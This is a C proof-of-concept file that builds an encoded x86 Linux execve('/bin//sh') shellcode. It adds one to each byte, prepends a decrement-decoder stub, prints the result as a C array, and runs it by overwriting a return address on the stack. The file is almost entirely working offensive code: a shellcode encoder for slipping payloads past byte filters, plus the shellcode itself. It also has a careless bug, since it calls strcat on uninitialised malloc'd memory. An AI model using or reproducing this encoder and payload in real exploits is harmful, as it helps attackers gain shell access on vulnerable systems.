/*
 * Proof-of-concept to test the decoder
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * DEC Shellcode encoder
 * 
 */

void execute(char *  data);

int main() {

  char decoder[] =
   "\xeb\x0b"   //                   jmp    d <label3>
   "\x5e"                  //    popl   %esi
   "\x6a\x00"              //     pushl  $0x0
   "\x59"                  //    popl   %ecx
   "\xfe\x0e"                   // decb   (%esi)
   "\x46"                  //    incl   %esi
   "\xe2\xfb"               //    loopl  6 <label2>
   "\xeb\x05"               //    jmp    12 <label4>
   "\xe8\xf0\xff\xff\xff"; //          calll  2 <label1>

/*  Copyright (c) Ramon de Carvalho Valle                          July 2003  *//*  x86/linux shellcode                                                       */
char shellcode[]=           /*  24 bytes                          */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x99"                  /*  cltd                              */
    "\xb0\x0b"              /*  movb    $0x0b,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
;

  
  char tmp;
  char *end;
  int size  = 1;
  int i; 
  int l = 15;

	printf("\n shellcode: %d\n", strlen(shellcode));
  
  for(i=0;i<strlen(shellcode);i++) {
    shellcode[i] += size;
  }

  decoder[4]  = strlen(shellcode);
  
  end = (char *) malloc(strlen(shellcode) + strlen(decoder));
  
  strcat(end,decoder);
  strcat(end,shellcode);
  
  printf("\nDecoder: %d Shellcode: %d Result %d\n",strlen(decoder),strlen(shellcode),strlen(end));
  
  printf("\n\nchar shellcode[] =\n");
  
  for(i = 0; i < strlen(end); ++i) {
    if(l >= 15) {
      if(i) printf("\"\n");
      printf( "\t\"");
      l = 0;
    }
    ++l;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }
  
  
  fflush(stdout);
  
  printf("\";\n");
  
  execute(end);
  free(end);
}


void execute(char *data) {
  
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)data;
  
}